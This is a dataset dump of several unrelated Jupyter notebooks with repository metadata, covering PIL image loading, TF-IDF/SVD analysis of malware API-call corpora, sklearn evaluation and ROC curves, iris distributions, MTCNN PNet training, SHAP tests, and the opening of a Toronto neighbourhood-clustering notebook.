hexsha | size | ext | lang | max_stars_repo_path | max_stars_repo_name | max_stars_repo_head_hexsha | max_stars_repo_licenses | max_stars_count | max_stars_repo_stars_event_min_datetime | max_stars_repo_stars_event_max_datetime | max_issues_repo_path | max_issues_repo_name | max_issues_repo_head_hexsha | max_issues_repo_licenses | max_issues_count | max_issues_repo_issues_event_min_datetime | max_issues_repo_issues_event_max_datetime | max_forks_repo_path | max_forks_repo_name | max_forks_repo_head_hexsha | max_forks_repo_licenses | max_forks_count | max_forks_repo_forks_event_min_datetime | max_forks_repo_forks_event_max_datetime | avg_line_length | max_line_length | alphanum_fraction | cells | cell_types | cell_type_groups |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb0096d3eea07ff7d0cb29009d927dd78daa5b63 | 710,854 | ipynb | Jupyter Notebook | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | 12,048.372881 | 709,720 | 0.964379 | [
[
[
"from PIL import Image\nimg = Image.open('Resources/Images/bobby.jpg')\n#img.show()\nimg",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb00a298fa9a80b4cd075d037ed79434b1240036 | 19,998 | ipynb | Jupyter Notebook | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | null | null | null | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | 1 | 2021-12-27T20:16:27.000Z | 2021-12-27T20:16:27.000Z | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | null | null | null | 30.027027 | 162 | 0.312831 | [
[
[
"%load_ext autoreload\n%autoreload 2|",
"_____no_output_____"
],
[
"import os\nimport pickle\n\nfrom utils.config import *",
"_____no_output_____"
],
[
"event = 'thread'\nfile = os.path.join(SANDY_ATTR_PATH, f'corpus.{event}.pkl')\n\ncorpus = pickle.load(open(file, \"rb\" ))\nattr = pickle.load(open(os.path.join(SANDY_ATTR_PATH, f'attr.{event}.pkl'), \"rb\" ))\ntargets = attr['target_arr']",
"_____no_output_____"
],
[
"print(len(corpus))\n\n# 8 Malware executions\n\nsumm = 0\nfor exe in attr['target_arr']:\n summ += len(exe)\n\n#attr['target_arr']",
"458\n"
],
[
"import pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame(corpus, columns=['APIs'])\ndf['target'] = np.concatenate(attr['target_arr'])\ndf",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import CountVectorizer\n\nvectorizer = CountVectorizer()\nX = vectorizer.fit_transform(df['APIs']).toarray()\ndf2 = pd.DataFrame(X)\ndf2[df2.any(axis=1)]",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import PCA, SparsePCA, TruncatedSVD\n\nngram = (1, 4)\nmin_df = 2\nn = 2\n\ndef generate_ngrams(corpus, ngram=None, min_df=2, n=2):\n \n if isinstance(ngram, tuple):\n start, finish = 1, 1\n else:\n start, finish = 4, 4\n \n for i in range(start):\n for j in range(i, finish):\n \n ngram = (i + 1, j + 1)# if ngram is None else ngram\n print(ngram)\n # idf vectorizer\n vectorizer = TfidfVectorizer(ngram_range=ngram, min_df=min_df)\n \n # ngram vectorizer\n #vectorizer = CountVectorizer(ngram_range=ngram, min_df=2)\n\n vec = vectorizer.fit_transform(corpus)\n print(f\"vec shape: {vec.shape}\")\n svd = TruncatedSVD(n_components=n, n_iter=5).fit(vec)\n var = svd.explained_variance_ratio_\n print(f\"NGRAM {i+1}:{j+1} VARIANCE SUM | {svd.explained_variance_ratio_.sum():.3f}\")\n x_transformed = svd.transform(vec)\n \n return x_transformed, var\n \nvec, var = generate_ngrams(corpus, ngram=None, min_df=min_df, n=n)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\ntarget_flat = [item for sublist in targets for item in sublist]\n\nfor i in range(len(vec)):\n ax.scatter(vec[i, 0], vec[i, 1], color='red' if target_flat[i] == 1 else 'green', alpha=0.5)\n \nax.set_xlabel(f'PC1 ({var[0]*100:.1f}%)', fontsize=15)\nax.set_ylabel(f'PC2 ({var[1]*100:.1f}%)', fontsize=15)\n#ax.set_title(f'ngram={str(ngram)} | n_components={str(n)}', fontsize=15)\n\nax.grid(True)\nfig.tight_layout()\nplt.savefig(\"thread-14-2.png\", bbox_inches='tight', dpi=150)\n \nplt.show()",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\n#for graph in master_g[1]:\ngraph = master_g[4]\n\nnode_color = ['red' if g[1].get('target', 0) == 1 else 'green' for g in graph.nodes(data=True)]\nnode_name = {g[0] : g[1].get('name', 0) for g in graph.nodes(data=True)}\n\nnx.draw(graph, pos=nx.spring_layout(graph, k=0.4), with_labels=True, node_color=node_color, labels=node_name, font_weight='bold', node_size=30, font_size=8)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00a451fa6aa51bc838996ac6a0aede21bca3af | 29,197 | ipynb | Jupyter Notebook | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | 1 | 2021-03-09T06:22:46.000Z | 2021-03-09T06:22:46.000Z | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | null | null | null | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | null | null | null | 66.812357 | 14,816 | 0.828887 | [
[
[
"import numpy as np\nimport sklearn\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"mnist = sklearn.datasets.load_digits()",
"_____no_output_____"
],
[
"X = mnist.data\ny = mnist.target",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"X = StandardScaler().fit_transform(X)",
"_____no_output_____"
],
[
"from sklearn.linear_model import LogisticRegression",
"_____no_output_____"
],
[
"logreg = LogisticRegression()",
"_____no_output_____"
],
[
"from sklearn.model_selection import KFold, cross_val_score",
"_____no_output_____"
],
[
"kf = KFold(n_splits=5, shuffle=True)",
"_____no_output_____"
],
[
"crv_scores = cross_val_score(logreg,\n X,\n y,\n cv=kf,\n scoring='accuracy',\n n_jobs=-1)",
"_____no_output_____"
],
[
"crv_scores.mean()",
"_____no_output_____"
]
],
[
[
"# ROC curve",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import make_classification",
"_____no_output_____"
],
[
"features,target = make_classification(n_samples=10000,\n n_features=10,\n n_classes=2,\n n_informative=3,\n random_state=3)",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train,X_test, y_train, y_test = train_test_split(features,target, test_size=0.2)",
"_____no_output_____"
],
[
"from sklearn.linear_model import LogisticRegression",
"_____no_output_____"
],
[
"logreg = LogisticRegression().fit(X_train,y_train)",
"_____no_output_____"
],
[
"from sklearn.metrics import accuracy_score, roc_auc_score, roc_curve",
"_____no_output_____"
],
[
"accuracy_score(logreg.predict(X_test),y_test)",
"_____no_output_____"
],
[
"target_probs = logreg.predict_proba(X_test)",
"_____no_output_____"
],
[
"target_probs = target_probs[:,1]",
"_____no_output_____"
],
[
"y_test.shape, target_probs.shape",
"_____no_output_____"
],
[
"fpr,tpr,threshold = roc_curve(y_test,target_probs)",
"_____no_output_____"
],
[
"plt.plot(fpr,tpr,label='logreg')\nplt.plot([0,1],linestyle='--',label='baseline')\nplt.plot([0,0],[0,1],c='green',label='ideal')\nplt.plot([0,1],[1,1],c='green')\nplt.grid(True)\nplt.legend()\nplt.gca().set_ylim(0,1.006)\nplt.gca().set_xlim(-0.006,1)",
"_____no_output_____"
]
],
[
[
"# Visualizing confusion matrix",
"_____no_output_____"
]
],
[
[
"iris = sklearn.datasets.load_iris()",
"_____no_output_____"
],
[
"X = iris.data\ny = iris.target",
"_____no_output_____"
],
[
"X_train, X_test, y_train,y_test = train_test_split(X,y,test_size=0.1)",
"_____no_output_____"
],
[
"clf = LogisticRegression()",
"_____no_output_____"
],
[
"preds = clf.fit(X_train,y_train).predict(X_test)",
"_____no_output_____"
],
[
"from sklearn.metrics import confusion_matrix",
"_____no_output_____"
],
[
"conf = confusion_matrix(y_test,preds)",
"_____no_output_____"
],
[
"import seaborn as sns",
"_____no_output_____"
],
[
"sns.heatmap(conf,annot=True,cmap='Blues')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00a4ae7718ea9215d93e902526258b67224192 | 54,677 | ipynb | Jupyter Notebook | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 1 | 2020-04-23T04:05:43.000Z | 2020-04-23T04:05:43.000Z | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 1 | 2019-03-20T12:13:42.000Z | 2019-03-20T12:13:42.000Z | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 2 | 2018-12-21T07:22:17.000Z | 2018-12-27T12:14:55.000Z | 148.983651 | 22,544 | 0.865282 | [
[
[
"%matplotlib inline\n# Importing the necessary libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns",
"_____no_output_____"
],
[
"# loading the data\niris = sns.load_dataset('iris')\niris.head()",
"_____no_output_____"
],
[
"iris.species.unique()",
"_____no_output_____"
],
[
"class_data = iris[iris.species == 'versicolor']",
"_____no_output_____"
],
[
"class_data.head()",
"_____no_output_____"
],
[
"counts,bin_edges = np.histogram(class_data.petal_length)\n\npdf = counts.astype(float)/sum(counts)\ncdf = np.cumsum(pdf)\n\nsns.lineplot(bin_edges[1:], pdf)\nsns.lineplot(bin_edges[1:], cdf)",
"_____no_output_____"
],
[
"sns.FacetGrid(iris, hue='species', size=5).map(sns.distplot, 'petal_length').add_legend()",
"/home/heenal/anaconda2/lib/python2.7/site-packages/seaborn/axisgrid.py:230: UserWarning: The `size` paramter has been renamed to `height`; please update your code.\n warnings.warn(msg, UserWarning)\n"
],
[
"sns.boxplot(iris.species, iris.petal_length)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00acc64f6ea0cec410967ca523215fc333d334 | 24,494 | ipynb | Jupyter Notebook | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | 2 | 2020-05-21T09:14:21.000Z | 2021-01-23T14:50:31.000Z | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | null | null | null | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | 1 | 2020-07-17T18:40:06.000Z | 2020-07-17T18:40:06.000Z | 55.668182 | 226 | 0.592717 | [
[
[
"##### 训练PNet",
"_____no_output_____"
]
],
[
[
"#导入公共文件\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nimport sys\nsys.path.append('../')\n\n# add other package\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nfrom tool.plotcm import plot_confusion_matrix\n\nimport pdb\n\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom itertools import product\n\n#torch.set_printoptions(linewidth=120)\n\nfrom mtcnn.PNet import PNet\n\nfrom mtcnn.mtcnn import RunBuilder\n\nfrom mtcnn.LossFn import LossFn\n\nfrom tool.imagedb import ImageDB\n\nfrom tool.imagedb import TrainImageReader\n\nfrom tool import image_tools\n\nimport datetime\n\ntorch.set_grad_enabled(True)\n",
"tensor([ 0.8875, -1.8204, 0.9606, -0.4746])\ntorch.Size([4, 3, 12, 12])\nb tensor([0.5551, 0.5520, 0.5659, 0.5395], grad_fn=<SqueezeBackward0>)\na: tensor([True, True, True, True])\nc tensor([0.5551, 0.5520, 0.5659, 0.5395], grad_fn=<MaskedSelectBackward>)\nc tensor([True, True, True, True])\ntensor([-0.6575, -1.0597, 1.4862, -0.6248])\ntorch.Size([4, 3, 12, 12])\nb tensor([0.5767, 0.5802, 0.5421, 0.5395], grad_fn=<SqueezeBackward0>)\na: tensor([True, True, True, True])\nc tensor([0.5767, 0.5802, 0.5421, 0.5395], grad_fn=<MaskedSelectBackward>)\nc tensor([True, True, True, True])\nRnet out label shape: torch.Size([4, 2])\nRnet out offset shape: torch.Size([4, 4])\na torch.Size([4, 2])\ntorch.Size([4, 3, 48, 48])\nRnet out label shape: torch.Size([4, 2])\nRnet out offset shape: torch.Size([4, 4])\nRnet out offset shape: torch.Size([4, 10])\n"
],
[
"def compute_accuracy(prob_cls, gt_cls):\n\n prob_cls = torch.squeeze(prob_cls)\n \n gt_cls = torch.squeeze(gt_cls)\n\n #we only need the detection which >= 0\n mask = torch.ge(gt_cls,0)\n #get valid element\n valid_gt_cls = torch.masked_select(gt_cls,mask)\n \n valid_prob_cls = torch.masked_select(prob_cls,mask)\n \n size = min(valid_gt_cls.size()[0], valid_prob_cls.size()[0])\n \n prob_ones = torch.ge(valid_prob_cls,0.6).float()\n \n right_ones = torch.eq(prob_ones,valid_gt_cls).float()\n \n #cms = confusion_matrix(prob_ones,right_ones,[0,1])\n \n #print(cms)\n \n #names = ('0','1')\n \n #plot_confusion_matrix(cms, names)\n \n #print(prob_cls.shape,gt_cls.shape,valid_prob_cls.shape,right_ones.shape)\n\n ## if size == 0 meaning that your gt_labels are all negative, landmark or part\n return torch.div(torch.mul(torch.sum(right_ones),float(1.0)),float(size)) \n ## divided by zero meaning that your gt_labels are all negative, landmark or part",
"_____no_output_____"
],
[
"#annotation_file = './image/imglist_anno_12.txt'\nannotation_file = '../image/12/imglist_anno_12.txt' #'./image/wider_face/wider_face_train_bbx_gt.txt' #'./image/anno_train.txt'\n\nmodel_store_path = '../model/Pnet'\n\nparams = OrderedDict(\n lr = [.01]\n ,batch_size = [2000]\n #,device = [\"cuda\", \"cpu\"]\n ,shuffle = [True]\n)\n\nend_epoch = 10\n\nfrequent = 10\n\n#runs = RunBuilder.get_runs(params)",
"_____no_output_____"
],
[
"def train_net(imdb=None):\n \n if imdb == None:\n imagedb = ImageDB(annotation_file)\n imdb = imagedb.load_imdb()\n #print(imdb.num_images)\n imdb = imagedb.append_flipped_images(imdb)\n \n for run in RunBuilder.get_runs(params):\n #create model path\n if not os.path.exists(model_store_path):\n os.makedirs(model_store_path)\n \n #create data_loader\n train_data=TrainImageReader(imdb,12,batch_size=run.batch_size,shuffle=run.shuffle)\n \n #print(train_data.data[0].shape,len(train_data.data))\n #Sprint(train_data.label[0][0])\n \n acc=0.0\n \n comment = f'-{run}'\n \n lossfn = LossFn()\n \n network = PNet()\n \n optimizer = torch.optim.Adam(network.parameters(), lr=run.lr)\n \n for epoch in range(end_epoch):\n train_data.reset() # shuffle\n epoch_acc = 0.0\n #for batch_idx,(image,(gt_label,gt_bbox,gt_landmark))in enumerate(train_dat)\n for batch_idx,(image,(gt_label,gt_bbox,gt_landmark))in enumerate(train_data):\n \n im_tensor = [ image_tools.convert_image_to_tensor(image[i,:,:,:]) for i in range(image.shape[0]) ]\n im_tensor = torch.stack(im_tensor)\n\n im_tensor = Variable(im_tensor)\n gt_label = Variable(torch.from_numpy(gt_label).float())\n\n gt_bbox = Variable(torch.from_numpy(gt_bbox).float())\n #gt_landmark = Variable(torch.from_numpy(gt_landmark).float())\n \n cls_pred, box_offset_pred = network(im_tensor)\n \n cls_loss = lossfn.cls_loss(gt_label,cls_pred)\n \n box_offset_loss = lossfn.box_loss(gt_label,gt_bbox,box_offset_pred)\n \n all_loss = cls_loss*1.0+box_offset_loss*0.5\n \n if batch_idx%frequent==0:\n accuracy=compute_accuracy(cls_pred,gt_label)\n accuracy=compute_accuracy(cls_pred,gt_label)\n show1 = accuracy.data.cpu().numpy()\n show2 = cls_loss.data.cpu().numpy()\n show3 = box_offset_loss.data.cpu().numpy()\n # show4 = landmark_loss.data.cpu().numpy()\n show5 = all_loss.data.cpu().numpy()\n print(\"%s : Epoch: %d, Step: %d, accuracy: %s, det loss: %s, bbox loss: %s, all_loss: %s, lr:%s \"%\n (datetime.datetime.now(),epoch,batch_idx, show1,show2,show3,show5,run.lr))\n epoch_acc = show1\n #计算偏差矩阵\n optimizer.zero_grad()\n all_loss.backward()\n optimizer.step()\n pass\n \n pass \n print('save modle acc:', epoch_acc)\n torch.save(network.state_dict(), os.path.join(model_store_path,\"pnet_epoch_%d.pt\" % epoch))\n torch.save(network, os.path.join(model_store_path,\"pnet_epoch_model_%d.pkl\" % epoch))\n pass\n \n pass\npass",
"_____no_output_____"
],
[
"if __name__ == '__main__':\n print('train Pnet Process:...')\n #加载图片文件\n #imagedb = ImageDB(annotation_file,'./image/train')\n #gt_imdb = imagedb.load_imdb()\n #gt_imdb = imagedb.append_flipped_images(gt_imdb)\n train_net()\n \n print('finish....')\n #print(gt_imdb[2])",
"train Pnet Process:...\nappend flipped images to imdb 72129\n2020-05-21 23:53:50.921667 : Epoch: 0, Step: 0, accuracy: 0.57535696, det loss: 0.88428044, bbox loss: 0.18741345, all_loss: 0.9779872, lr:0.01 \n2020-05-21 23:53:59.577856 : Epoch: 0, Step: 10, accuracy: 0.94787234, det loss: 0.18041657, bbox loss: 0.046751834, all_loss: 0.20379248, lr:0.01 \n2020-05-21 23:54:08.230471 : Epoch: 0, Step: 20, accuracy: 0.95137423, det loss: 0.16063786, bbox loss: 0.036383662, all_loss: 0.17882968, lr:0.01 \n2020-05-21 23:54:17.165781 : Epoch: 0, Step: 30, accuracy: 0.95741326, det loss: 0.14517276, bbox loss: 0.039338004, all_loss: 0.16484176, lr:0.01 \n2020-05-21 23:54:25.829193 : Epoch: 0, Step: 40, accuracy: 0.9542827, det loss: 0.15249781, bbox loss: 0.040936694, all_loss: 0.17296615, lr:0.01 \n2020-05-21 23:54:34.305235 : Epoch: 0, Step: 50, accuracy: 0.95531917, det loss: 0.14326507, bbox loss: 0.047609273, all_loss: 0.1670697, lr:0.01 \n2020-05-21 23:54:42.793345 : Epoch: 0, Step: 60, accuracy: 0.9514512, det loss: 0.1465687, bbox loss: 0.03774166, all_loss: 0.16543953, lr:0.01 \n2020-05-21 23:54:51.226672 : Epoch: 0, Step: 70, accuracy: 0.94736844, det loss: 0.14733544, bbox loss: 0.03899685, all_loss: 0.16683386, lr:0.01 \nsave modle acc: 0.94736844\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb00ae01ef5acbc785185fd2f4bc594cf52280a2 | 8,022 | ipynb | Jupyter Notebook | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | 28.548043 | 99 | 0.417477 | [
[
[
"import shap\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nRANDOM_SEED = 42\ntf.set_random_seed(RANDOM_SEED)\n\ndef get_iris_data():\n iris = datasets.load_iris()\n data = iris[\"data\"]\n target = iris[\"target\"]\n # Prepend the column of 1s for bias\n N, M = data.shape\n all_X = np.ones((N, M + 1))\n all_X[:, 1:] = data\n # Convert into one-hot vectors\n num_labels = len(np.unique(target))\n all_Y = np.eye(num_labels)[target] # One liner trick!\n return train_test_split(all_X, all_Y, test_size=0.33, random_state=RANDOM_SEED)",
"_____no_output_____"
]
],
[
[
"# Example that generates nans",
"_____no_output_____"
]
],
[
[
"train_X, test_X,_,_ = get_iris_data()\n# train_X = train_X[:,1:5]\n# test_X = test_X[:,1:5]\ninds = np.random.choice(train_X.shape[0], 3, replace=False)\ndata = train_X[inds,:]\ntest_in = test_X[10:11,:]\nx_size = train_X.shape[1] # Number of input nodes: 4 features and 1 bias\nX = tf.placeholder(\"float\", shape=[None, x_size])",
"_____no_output_____"
],
[
"print(train_X)",
"[[1. 5.7 2.9 4.2 1.3]\n [1. 7.6 3. 6.6 2.1]\n [1. 5.6 3. 4.5 1.5]\n [1. 5.1 3.5 1.4 0.2]\n [1. 7.7 2.8 6.7 2. ]\n [1. 5.8 2.7 4.1 1. ]\n [1. 5.2 3.4 1.4 0.2]\n [1. 5. 3.5 1.3 0.3]\n [1. 5.1 3.8 1.9 0.4]\n [1. 5. 2. 3.5 1. ]\n [1. 6.3 2.7 4.9 1.8]\n [1. 4.8 3.4 1.9 0.2]\n [1. 5. 3. 1.6 0.2]\n [1. 5.1 3.3 1.7 0.5]\n [1. 5.6 2.7 4.2 1.3]\n [1. 5.1 3.4 1.5 0.2]\n [1. 5.7 3. 4.2 1.2]\n [1. 7.7 3.8 6.7 2.2]\n [1. 4.6 3.2 1.4 0.2]\n [1. 6.2 2.9 4.3 1.3]\n [1. 5.7 2.5 5. 2. ]\n [1. 5.5 4.2 1.4 0.2]\n [1. 6. 3. 4.8 1.8]\n [1. 5.8 2.7 5.1 1.9]\n [1. 6. 2.2 4. 1. ]\n [1. 5.4 3. 4.5 1.5]\n [1. 6.2 3.4 5.4 2.3]\n [1. 5.5 2.3 4. 1.3]\n [1. 5.4 3.9 1.7 0.4]\n [1. 5. 2.3 3.3 1. ]\n [1. 6.4 2.7 5.3 1.9]\n [1. 5. 3.3 1.4 0.2]\n [1. 5. 3.2 1.2 0.2]\n [1. 5.5 2.4 3.8 1.1]\n [1. 6.7 3. 5. 1.7]\n [1. 4.9 3.1 1.5 0.1]\n [1. 5.8 2.8 5.1 2.4]\n [1. 5. 3.4 1.5 0.2]\n [1. 5. 3.5 1.6 0.6]\n [1. 5.9 3.2 4.8 1.8]\n [1. 5.1 2.5 3. 1.1]\n [1. 6.9 3.2 5.7 2.3]\n [1. 6. 2.7 5.1 1.6]\n [1. 6.1 2.6 5.6 1.4]\n [1. 7.7 3. 6.1 2.3]\n [1. 5.5 2.5 4. 1.3]\n [1. 4.4 2.9 1.4 0.2]\n [1. 4.3 3. 1.1 0.1]\n [1. 6. 2.2 5. 1.5]\n [1. 7.2 3.2 6. 1.8]\n [1. 4.6 3.1 1.5 0.2]\n [1. 5.1 3.5 1.4 0.3]\n [1. 4.4 3. 1.3 0.2]\n [1. 6.3 2.5 4.9 1.5]\n [1. 6.3 3.4 5.6 2.4]\n [1. 4.6 3.4 1.4 0.3]\n [1. 6.8 3. 5.5 2.1]\n [1. 6.3 3.3 6. 2.5]\n [1. 4.7 3.2 1.3 0.2]\n [1. 6.1 2.9 4.7 1.4]\n [1. 6.5 2.8 4.6 1.5]\n [1. 6.2 2.8 4.8 1.8]\n [1. 7. 3.2 4.7 1.4]\n [1. 6.4 3.2 5.3 2.3]\n [1. 5.1 3.8 1.6 0.2]\n [1. 6.9 3.1 5.4 2.1]\n [1. 5.9 3. 4.2 1.5]\n [1. 6.5 3. 5.2 2. ]\n [1. 5.7 2.6 3.5 1. ]\n [1. 5.2 2.7 3.9 1.4]\n [1. 6.1 3. 4.6 1.4]\n [1. 4.5 2.3 1.3 0.3]\n [1. 6.6 2.9 4.6 1.3]\n [1. 5.5 2.6 4.4 1.2]\n [1. 5.3 3.7 1.5 0.2]\n [1. 5.6 3. 4.1 1.3]\n [1. 7.3 2.9 6.3 1.8]\n [1. 6.7 3.3 5.7 2.1]\n [1. 5.1 3.7 1.5 0.4]\n [1. 4.9 2.4 3.3 1. ]\n [1. 6.7 3.3 5.7 2.5]\n [1. 7.2 3. 5.8 1.6]\n [1. 4.9 3.1 1.5 0.1]\n [1. 6.7 3.1 5.6 2.4]\n [1. 4.9 3. 1.4 0.2]\n [1. 6.9 3.1 4.9 1.5]\n [1. 7.4 2.8 6.1 1.9]\n [1. 6.3 2.9 5.6 1.8]\n [1. 5.7 2.8 4.1 1.3]\n [1. 6.5 3. 5.5 1.8]\n [1. 6.3 2.3 4.4 1.3]\n [1. 6.4 2.9 4.3 1.3]\n [1. 5.6 2.8 4.9 2. ]\n [1. 5.9 3. 5.1 1.8]\n [1. 5.4 3.4 1.7 0.2]\n [1. 6.1 2.8 4. 1.3]\n [1. 4.9 2.5 4.5 1.7]\n [1. 5.8 4. 1.2 0.2]\n [1. 5.8 2.6 4. 1.2]\n [1. 7.1 3. 5.9 2.1]]\n"
]
],
[
[
"### Multiplication",
"_____no_output_____"
]
],
[
[
"# yhat = tf.multiply(X[:,0:1],X)\n# yhat = tf.multiply(X,X[:,0:1])\nyhat = tf.multiply(X,X)\nmodel = (X,yhat)\ne = shap.DeepExplainer(model, data)\nshap_values = e.shap_values(test_in)\nsums = np.array([shap_values[i].sum() for i in range(len(shap_values))])\nsess = tf.Session()\ndiff = sess.run(model[1], feed_dict={model[0]: test_in})[0,:] - \\\n sess.run(model[1], feed_dict={model[0]: data}).mean(0)\nprint(sums)\nprint(diff)\nassert np.allclose(sums, diff, atol=1e-06), \"Sum of SHAP values does not match difference!\"",
"[ 0. 11.59333391 1.03666701 14.87333215 2.50333347]\n[ 0. 11.593332 1.0366669 14.87333 2.5033336]\n"
]
],
[
[
"### Division",
"_____no_output_____"
]
],
[
[
"# yhat = tf.div(X,X[:,0:1]) # These examples don't work\n# yhat = tf.div(X[:,0:1],X) # These examples don't work\n# yhat = tf.div(X[:,0:2],X[:,2:4])\nyhat = tf.div(X,X)\nmodel = (X,yhat)\ne = shap.DeepExplainer(model, data)\nshap_values = e.shap_values(test_in)\nsums = np.array([shap_values[i].sum() for i in range(len(shap_values))])\nsess = tf.Session()\ndiff = sess.run(model[1], feed_dict={model[0]: test_in})[0,:] - \\\n sess.run(model[1], feed_dict={model[0]: data}).mean(0)\nprint(sums)\nprint(diff)\nassert np.allclose(sums, diff, atol=1e-06), \"Sum of SHAP values does not match difference!\"",
"[0.00000000e+00 2.98023224e-09 9.93410746e-09 0.00000000e+00\n 0.00000000e+00]\n[0. 0. 0. 0. 0.]\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb00bfbe05b0351c17a62bef55a9b49b494304d7 | 335,421 | ipynb | Jupyter Notebook | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | 79.767182 | 155,804 | 0.67268 | [
[
[
"## Segmenting and Clustering Neighborhoods in Toronto",
"_____no_output_____"
],
[
"In this project we explore, segment, and cluster the neighborhoods in the city of Toronto. Since the data is not available in the Internet on a simple presentation, we have to scrape a Wikipedia page wrangle the data, clean it, and then read it into a structured format.",
"_____no_output_____"
]
],
[
[
